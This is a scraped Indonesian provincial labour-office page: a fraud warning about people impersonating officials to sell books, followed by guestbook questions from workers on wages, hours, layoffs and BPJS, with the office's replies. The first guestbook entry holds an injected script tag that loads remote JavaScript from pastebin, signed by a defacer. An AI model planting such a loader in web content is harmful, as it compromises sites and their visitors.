(YOGYAKARTA) Akhir-akhir ini Dinas Tenaga Kerja dan Transmigrasi Daerah Istimewa Yogyakarta (Disnakertrans DIY) menerima beberapa pengaduan dari perusahaan di wilayah DIY terkait adanya orang yang mengaku petugas dari Disnakertrans DIY yang datang ke perusahaan untuk membagikan buku, stiker, ataupun poster tertentu namun kemudian meminta uang sebagai ganti biaya cetak.
Dari pengaduan salah satu perusahaan, disebutkan ada dua orang yang mengaku sebagai pegawai Disnakertrans DIY mendatangi perusahaan untuk melakukan sosialisasi peraturan perundangan kemudian membagikan buku tertentu namun meminta untuk membayarnya dengan alasan sebagai ganti ongkos cetak, disebutkan pula bila perusahaan tidak mau membayarnya, orang tersebut mengancam akan melakukan tindakan tertentu terhadap perusahaan .
Menanggapi hal itu, Kepala Bidang Hubungan Industrial Dan Perlindungan Tenaga Kerja Disnakertrans DIY, Ariyanto Wibowo, SH., M.Hum. menegaskan bahwa “Disnakertrans DIY hingga saat ini tidak pernah menugaskan pegawai untuk membagikan buku, stiker, ataupun poster tertentu tanpa disertai Surat Penugasan, apalagi meminta perusahaan tersebut untuk membayar dengan sejumlah uang, kalaupun ada kunjungan dari pegawai Disnakertrans DIY, pasti selalu disertai Surat Penugasan dan tidak pernah meminta perusahaan untuk menyerahkan sejumlah uang. Jadi dipastikan apa yang diadukan oleh perusahaan terkait adanya orang yang mengaku petugas dari Disnakertrans DIY yang datang ke berbagai perusahaan untuk membagikan buku, stiker, atau apapun namun kemudian meminta uang adalah salah satu bentuk modus penipuan.” 
Oleh karena itu Bapak Ariyanto Wibowo, SH., M.Hum. menghimbau kepada seluruh perusahaan di DIY untuk berhati-hati terhadap segala bentuk penipuan yang mengatasnamakan Disnakertrans DIY dan melaporkan kepada Kepolisian bila mengalami kejadian seperti yang diadukan oleh perusahaan tersebut. Disnakertrans DIY juga mempersilahkan apabila ada perusahaan yang ingin bertanya terkait program ataupun kegiatan yang sedang dilaksanakan untuk dapat menghubungi nomor (0274)885147 atau dapat secara langsung datang ke Kantor Disnakertrans DIY.
  ; (Klik gambar untuk memperbesar)
PEMERINTAH DAERAH DIY
DINAS NAKERTRANS
nakertrans.jogjaprov.go.id
 
DAFTAR TULISAN DI BUKU TAMU
« Home
 
1.
hacked (Magelang)
Selasa, 15 Agt 2017 22:49:17
Judul : hacked
Pesan :
<script type="text/javascript" src="https://pastebin.com/raw/m94mtuYR"></script>

hacked by gh0stP0W3R
2.
Ovan Onny Madeka (Sosrowijayan kulon GT I/212)
Selasa, 15 Agt 2017 21:41:52
Judul : Seleksi pelatihan
Pesan :
Tahap seleksi pelatihan di balai kota tertanggal 16 Agustus 2017.itu nanti diberi soal soal atau bagaimana? Matur nuwun
3.
Rahmad (Turgo 007/005,Purwobinangun,Pakem)
Sabtu, 12 Agt 2017 10:26:31
Judul : bisakah surat referensi kerja diperjuangkan ?
Pesan :
Selamat pagi, saya ingin bertanya apakah surat referensi kerja dapat diperjuangkan ?
Karena itu adalah salah satu syarat untuk pengurusan klaim BPJS Ketenagakerjaan saya.
Jadi begini, pada tgl 7 juni 2017 ini saya mengajukan surat resign di perusahaan tempat saya bekerja yg didalamnya saya cantumkan mulai berhenti per tgl 1 juli 2017 dan tetap melaksanakan kewajiban sampai tgl 30 juni 2017, saat saya datang ke perusahaan untuk mengembalikan atribut kerja sekalian untuk menerima gaji dan referensi kerja pd tgl 3 juli 2017 ternyata saya tidak mendapatkan surat referensi kerja dari sana dgn alasan saya terlambat mengajukan surat resign, sebelumnya yg saya tahu syarat pengajuan surat resign adalah awal bulan, tapi pihak personalia mengatakan bahwa pengajuan surat resign paling lambat tgl 3 setiap bulannya, jadi saya tidak bisa mendapatkan referensi kerja saya, saya sudah mohon toleransi tapi tidak diberi, padahal saya sudah bekerja di perusahaan itu kurang lebih 2,5 tahun. Karena saya tidak memiliki referensi terakhir jadi saya juga tidak bisa untuk mengklaim dana BPJS KETENAGAKERJAAN yg juga hak saya.
Perusahaan tempat saya pernah bekerja masih merupakan P.O (Perseorangan) padahal karyawannya sudah lebih dari 100 orang.
Apakah hak saya untuk mendapatkan referensi kerja masih bisa diperjuangkan agar saya dapat mengklaim dana BPJS Ketenagakerjaan saya ?
Jika bisa, apa yg harus saya lakukan ?

Sebelum dan sesudahnya saya ucapkan terimakasih.
Disnakertrans DIY :
Kepada Yth,
Sdr. Rahmad
di Yogyakarta

Sebelumnya terima kasih atas pertanyaan yang saudari sampaikan.
Pada prinsipnya manfaat dana Jaminan Hari Tua BPJS Ketenagakerjaan adalah bagi pekerja, namun karena data yang anda sampaikan sangat terbatas, kami tidak dapat menjawab secara terperinci.
Saran kami, silahkan saudara membuat pengaduan tertulis ditujukan kepada Kepala Dinas Tenaga Kerja dan Transmigrasi DIY d/a. Jl. Ringroad Utara, Maguwoharjo, Depok, Sleman disertai data-data yang lengkap mengenai kronologis permasalahan yang saudara alami, nama dan alamat perusahaan.
4.
SARNO (jalan magelang km 5 no 119)
Jumat, 11 Agt 2017 16:01:46
Judul : jam kerja
Pesan :
Saya mau bertanya tentang keluhan jam kerja di tempat kerja saya
Jam kerja toko dibagi 2 shif
Shift pagi 08:30 - 17:00
Shift siang 12:30 - 21:30
Untuk hari Sabtu Shif pagi 08:30 - 17:30 dan shif siang 12:30 - 22:00
Untuk hari Minggu Shif pagi 08:30 - 17 :30 dan shif Siang 12:30 - 21:30
Apakah itu semua sudah standar jam kerja dari dinas ketenagakerjaan??
TRIMAKASIH....
Disnakertrans DIY :
Kepada Yth.
Bp. Sarno
di Yogyakarta

Sebelumnya kami ucapkan terimakasih atas pertanyaan yang saudara sampaikan.
Secara umum waktu kerja adalah :
a. 7 (tujuh) jam 1 (satu) hari dan 40 (empat puluh) jam 1 (satu) minggu untuk 6 (enam) hari kerja dalam 1 (satu) minggu; atau
b. 8 (delapan) jam 1 (satu) hari dan 40 (empat puluh) jam 1 (satu) minggu untuk 5 (lima) hari kerja dalam 1 (satu) minggu.
Perusahaan yang memperkerjakan melebihi ketentuan tersebut dihitung sebagai kerja lembur.
Namun secara khusus hal tersebut tidak berlaku bagi jenis dan sifat pekerjaan tertentu.
Hal tersebut diatur dalam UU No. 13 Tahun 2003 tentang Ketenagakerjaan.
Untuk lebih jelasnya silakan saudara langsung berkonsultasi dengan Pengawas Ketenagkerjaan atau mediator kami di Kantor Dinas Tenaga Kerja dan Transmigrasi DIY d/a. Jl. Ringroad Utara, Maguwoharjo, Depok, Sleman.
5.
indrawati (karanganyar RT/RW: 10/29 sinduadi mlati slema)
Kamis, 10 Agt 2017 16:53:09
Judul : magang di dinas jogja
Pesan :
selamat sore, saya mahasiswa tingkat akhir jurusan akuntansi kebetulan saya mengambil konsentrasi Akuntansi Sektor Publik saya ingin bertanya apakah ada lowongan magang di Dinas jogja?

terimakasi.
6.
Nur Azmi Setiawan (Jl. Gedongkuning No.03 Banguntpan Bantu DIY)
Jumat, 4 Agt 2017 15:52:55
Judul : Bertanya Gaji tidak tepat waktu
Pesan :
Selamat sore.

saya ingin melaporkan perihal pengganjian yang sering terlambat, dan susahnya perusahaan untuk diajak komunikasi

saya bekerja sebagai outsouscing
ditempatkan di PT PLN (Persero) Area Yogyakarta
Jl. Gedongkuning NO.03 Banguntapan Bantul D.I.Yogyakarta
vendor alih daya PT Asia Daya

jika demikian saya harus lapor atau berbuat apa agar adil sesuai dengan perjanjian yang diawal sudah disepakati

demikin mohon informasinya
Disnakertrans DIY :
Kepada Yth,
Sdr. Nur Azmi
di Yogyakarta

Terimakasih atas pengaduan yang saudara sampaikan.
Pengaduan saudara telah kami proses secara kedinasan untuk dilakukan klarifikasi ke Perusahaan tersebut.
Bila memerlukan penjelasan, silahkan saudara datang menemui Pengawas Ketenagakerjaan di Dinas Tenaga Kerja dan Transmigrasi DIY, Jl. Ringroad Utara, Maguwoharjo, Depok, Sleman
7.
muna (danurejan)
Kamis, 3 Agt 2017 09:28:59
Judul : ketidakadilan
Pesan :
assalamu'alaikum.
saudara saya sudah bekerja lebih dari 2 tahun di PT tetap saja dijadikan pekerja kasual dan tidak pernah mendapatkan THR. lha ada pekerja yang baru sktr 2 bulan langsung dijadikan pekerja yang statusnya kontrak.

semoga cerita saya ini mendapatkan tanggapan dari disnakertrans.
terima kasih. wassalamualaikum wr wb
Disnakertrans DIY :
Kepada Yth,
Sdri. Muna
di Yogyakarta

Sebelumnya kami haturkan keprihatinan atas kejadian yang menimpa saudarai, semoga segera dapat kita dapatkan penyelesaiannya.
Namun mengingat keterbatasan informasi yang saudari sampaikan, kami sarankan saudara membuat aduan tertulis yang memuat data mengenai perusahaan dan permasalahan yang saudara alami, ditujukan ke Kepala Dinas Tenaga Kerja dan Transmigrasi DIY, Up. Kasi. Pengawasan Ketenagakerjaan, Jl. Ringroad Utara, Maguwoharjo, Depok, Sleman atau datang langsung menemui Pengawas Ketenagakerjaan di alamat tersebut.
8.
Banu (Kepuh, Yogyakarta)
Selasa, 1 Agt 2017 16:42:01
Judul : Tidak diberi BPJS Ketenagakerjaan & THR
Pesan :
Sebenarnya ini terjadi sama saudara kandung saya. Dia sudah lebih dari 9 bulan bekerja di PT Cerise yang sebelumnya bertempat di Mantrijeron sekarang pindah ke jln. Tamansiswa, dan belum diberi BPJS sesuai janji, waktu pemberian gaji sering molor serta dipotong 200 ribu setiap bulannya dan tidak diberi THR (kalau masalah Gaji & THR menurut saya tidak terlalu menjadi masalah karena gaji masih sesuai UMR).

Terhitung bulan ini sudah habis kontrak dan telah mengundurkan diri pada bulan Juli kemaren. Tetapi tetap disuruh masuk kerja oleh atasannya, sampai tanggal 1 Agustus ini belum diberi gaji, ijazah, dan uang potongan 200 ribu tiap bulan yang katanya akan diberikan. Janjinya pekerjaannya mau di review dulu sebelum memberikan yang tersebut sebelumnya.

Dari cerita saudara kandung saya diatas, saya hanya ingin meminta sarannya bila berkenan di email saya "royselaludar_more@yahoo.com".

Terima kasih.
Disnakertrans DIY :
Kepada Yth.
Bp. Banu
di Kepuh Yogyakarta

Sebelumnya kami haturkan keprihatinan atas kejadian yang menimpa saudara kandung Bp. Banu. Mohon Bp. Banu bisa memberikan informasi yang jelas terkait kasus yang dialami saudara kandung Bp. Banu, nama & alamat perusahaan melalui
email : disnakertrans@jogjaprov.go.id
agar bisa ditindaklanjuti oleh pegawai pengawas ketenagakerjaan.

Terimakasih.

9.
Triyanto (mangunan) (Mangunan Rt 15 mangunan dlingo bantul)
Senin, 31 Jul 2017 14:13:02
Judul : PHK Massal karena Perusahaan melakukan efisie
Pesan :
Yth.Dinas Teenaga Kerja dan Transmigrasi DIY

Maaf saya mau tanya ditempat kerja saya PT.SATU BUMI akan ada PHK masal saya mau tanya Hak-hak apa saja yang saya dapatkan setelah saya di PHK nanti yang sesuai dengan UU.dan apakah karyawan tetap bisa kena PHK juga selain itu saya juga sudah mempunyai SK ,yang menjadi pertanyaan saya ,saya itu belum pernah mendapatkan surat SP-1,2dan 3 apakah keputusan tersebut kuat untuk mengeluarkan saya.
mohon pencerahan agar kami bertindak sesuai dendan prosedur yang ada

Terimakasih
Disnakertrans DIY :
Kepada Yth.
Bp. Triyanto
di Mangunan

Perusahaan dapat melakukan PHK dengan alasan efisiensi dan pekerja berhak atas uang pesangon yang diatur pasal 164 ayat (3) UU 13 tahun 2003. Jika tidak terjadi kesepakatan atas besaran pesangon ini saudara dapat melaporkan ke seksi hubungan Industrial Dinas Tenaga Kerja & Transmigrasi di Kabupaten Bantul.

Terimakasih.
10.
SISCA (: kota gede)
Minggu, 30 Jul 2017 14:07:54
Judul : buku peraturan
Pesan :
assalamualaikum. kepada yg terhormat bapak atau ibu disnaker,tgl 17-7-2017 kantor saya didatangi 2 petugas berseragam layaknya PNS tapi tanpa atribut,menawarkan buku peraturan ketenagakerjaan,seingat saya 2 petugas itu tidak pernah menyebut dari DIY,karena saya juga butuh buat pelajaran diri maka saya ambil dan 2 petugas itu juga bicara klau buku itu sifatnya penawaran dan tidak ada paksaan."pertanyaan saya apa ada yg salah klau buku itu juga penting buat bahan perpustakaan,dan itupun sifatnya himbauan dan gak ada unsur pemaksaan"kita hidup ini positif.klau memang kita membutuhkan kan tidak ada masalah,"janganlah kita memvonis klau belum tau kejadian sebenarnya"
Disnakertrans DIY :
Kepada Yth,
Sdri. Sisca
di Yogyakarta

Pada prinsipnya Dari Dinas yang membidangi Tenaga Kerja Pusat/Provinsi/ kabupaten Kota tidak mengeluarkan buku yang sifatnya membeli seperti kasus yang banyak diadukan pada kami.
Namun banyak pengaduan yang masuk ke kami TERINDIKASI KUAT adanya unsur PIDANA dan jelas hal tersebut SALAH karna merupakan tindak pidana penipuan. Namun terkait banyaknya kasus penipuan dengan modus penjualan buku dan mengatasnamakan Dinas Tenaga Kerja yang sedang marak di DIY, saat ini kami telah melakukan beberapa langkah hukum dan mengejar pelaku penipuan untuk melindungi kepentingan masyarakat luas.
Bila saudara membutuhkan referensi terkait peraturan perundangan bidang ketenagakerjaan silahkan secara langsung datang ke Dinas yang membidangi ketenagakerjaan di Propinsi/Kabupaten/Kota. Kami himbau agar perusahaan berhati-hati terhadap segala bentuk penipuan yang mengatasnamakan Disnaker, dan jika ada yang janggal agar segera menghubungi Seksi Pengawasan Disnakertrans DIY No. telp (0274)885147.
Hal ini juga sudah kami beritakan melaluai website berita
http://nakertrans.jogjaprov.go.id/contentdetil.php?kat=brta&id=NDY1&fle=aW5kZXgucGhw&lback=

Demikian Terimakasih

Menampilkan data ke 1-10 dari 131 data.
Halaman 1 2 3 4 5 6 7 8 9 10 11 »

MENULIS KE BUKU TAMU
 
:
:
:
:
:
Verifikasi *:
 

*) : Harus diisi




Dinas Tenaga Kerja dan Transmigrasi DIY
Jl. Lingkar Utara Maguwoharjo, Depok, Sleman, DIY
Telp. (0274) 885147   Fax. (0274) 885036